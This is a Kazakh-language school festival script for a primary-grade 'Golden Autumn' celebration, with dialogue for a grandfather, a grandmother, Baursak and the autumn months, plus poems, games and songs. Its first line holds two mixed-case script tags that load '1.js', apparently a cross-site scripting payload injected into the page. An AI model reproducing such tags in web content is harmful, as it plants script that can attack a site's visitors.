<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.10.2018

Қызылтаң орта мектебі

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Алтын күз мерекесі

 

Өткізген: Бастауыш

сынып мұғалімдері

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2018-2019 оқу жылы

Мақсаты: Күз мезгілі туралы түсініктерін кеңейте түсу; күзді басқа

мезгілдермен салыстыра отырып, айырмашылығын ажырата білу. Тұлғалық

қасиеттерінің дамуына ықпал ету. «Еңбек түбі- береке» деген халық даналығының

дұрыстығына көз жеткізу.

 

Әдемі безендірілген сахна, ортада үйшік тұр. Отынын ұстап

ата келеді.

Ата: -Кемпір, ай, кемпір!

Үйдесін бе? Уф, шаршадым.

Әже: (Терезеден қарап) –Иә үйдемін ғой. Не болды?

Ата: (қолындағы отынды кіргізіп) –Қарным ашты, бауырсақ

пісірші.

 (Ата орындыққа

отырып , дем алады. Әжей бауырсақ пісіріп. Қасына шығады да келген қонақтарға

назарын аударады)

Әже: Армысыздар, құрметті ата- аналар!

Ата: Бармысыздар, жадыраған жас достар!добавить

Әже: Уа, халайық,

Мұнда назар салайық!

Мерекесі халықтың

Алтын күзге арналған

Кешімізді бастайық!

Ата: Армысың, сары алтындай «Алтын күзім»!

Күн нұрын төккендей боп жапырағың.

Қарсы алып біз өзіңді тұрмыз міне,

Алтын күз деп өзіңе айдар тағып - деп ортаға 2-3 сынып

оқушыларын шақырамыз.

Би: «Күзгі вальс»

(Бұл кезде бауырсақ орындықтан секіріп түседі)

Бауырсақ: -Тас қараңқы орманда,

Кішкентай ағаш үйде.

Әжем ұннан жасаған,

Атам болса ән салған:

Сары, сары домалақ,

Іші ауа толғанақ.

Қиянқылық жасаған,

Күзді сондай ұнатқан...  

Ой шаршадым! О, әжемнің бақшасында не бар?- деп асқабақты жылып алады.

Ішінен алтындай қыз шығады.

Бауырсақ: -Ой сен кімсің?

Қыркүйек: -Нағыз Алтын күз- қыркүйек айы.

                   

  Алтын нұрдай тамшылап,

                      Жапырақтар төгілді.

                      Біздің өмір таң шуақ,

                      Біздің өмір көңілді.

Бауырсақ: Керемет, ендеше ойын ойнайықшы!

Ойын: «Жемістерді ажырат»

1 ж:

Дала біткен жайдары,

Құлпырыпты түлепті.

Ақбидайды айдарлы,

Жапан түзге кім екті?

Диқан бабам екті де

Еңбектен еш қайтпады,

Алдына кеп төкті де,

Нанды үйіп тастады -деп 4- сынып оқушыларын ортаға

шақырамыз.

Көрініс: «Тауық

пен тышқан»

Бауырсақ:

Тас қараңқы орманда,

Кішкентай ағаш үйде.

Әжем ұннан жасаған,

Атам болса ән салған:

Сары, сары домалақ,

Іші ауа толғанақ.

Қиянқылық жасаған,

Күзді сондай ұнатқан.

   -Күз неткен

керемет! Бақшаға кіріп қызылша жұлып алады.

-Ой сен кімсің?

Қазан: Күзгі маусымның екінші айымын- Қазан

Қарашы мына далаға,

Реңі сондай сары ала

Пісіпті алма балбырап,

Сарғайып жатыр бал құрақ.

Бауырсақ: -Сен не білесің?

Қазан: -Мен балаларға жұмбақ жасырайын.

«Жұмбақ шеш»

2 ж: Аспанда қаптаған

Бұлт тыным таппаған

Жөңкелеп көшеді

Суық жел еседі.

Суықтан қорықпайды 1- сынып бірақ.

Ән: «Алтын күз»

Ойын: (ата-аналарға арналған)

Бауырсақ: -Тас қараңқы орманда,

Кішкентай ағаш үйде.

Әжем ұннан жасаған,

Атам болса ән салған:

Сары, сары домалақ,

Іші ауа толғанақ.

Қиянқылық жасаған,

Күзді сондай ұнатқан. Уф қарным ашты ғой! Мына сәбізді

жей тұрайыншы- деп сәбізді жұлып алады.

-Ой сен кімсің?

Қараша: -Мен күздің кенже айымын- Қараша.

Жемісті мол теретін

Күз дос екен сіздермен

Бәрін тауып беретін

Жомарт екен «күз» деген.

Бауырсақ: -Сенде балаларға бірдеңе әкелдің бе?

Қараша: -Әрине, балалар, күз мезгілінде туғандар бар ма?

Ойын: «Күнбағыс» ойыны

Ережесі: Ортаға 5- күнбағыстың бас киімі қойылады,

музыка әуенімен 6- бала ортаға шығады музыка тоқтағанда бас киімді киіп үлгеруі

керек, үлгермеген бала ойыннан шығады.

Ойын:

«Мен жайлы не білесің?»

Қыркүйек:

-Мен күздің алғашқы аймын. Мен туралы не білесіңдер?

Қазан:

-Мен қазан айымын. Мен жайлы не естідіндер?

Қараша:

-Мен қарашамын. Мен нені білдіремін?

1 ж:

Уақыт өтпес бірліксіз,

Бақыт келмес тірліксіз.

Талмай еңбек етіңдер,

Қыстан аман өтіңдер- деп қош сау болыңдар, келесі жылы амандықпен кездесейік!

 

2 ж:

Жел түлегім,

Солды гүл тегіс.

Көш тартып тізіліп

Қоштасты бізбен күз! дей келе құрметті қонақтар бүгінгі «Армысың, Алтын күз»

кешін жабық деп жариялаймыз

 

Шығармашылық жұмыс:  Көрмені тамашалау

 

 

 

 




Просмотров: 2376

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу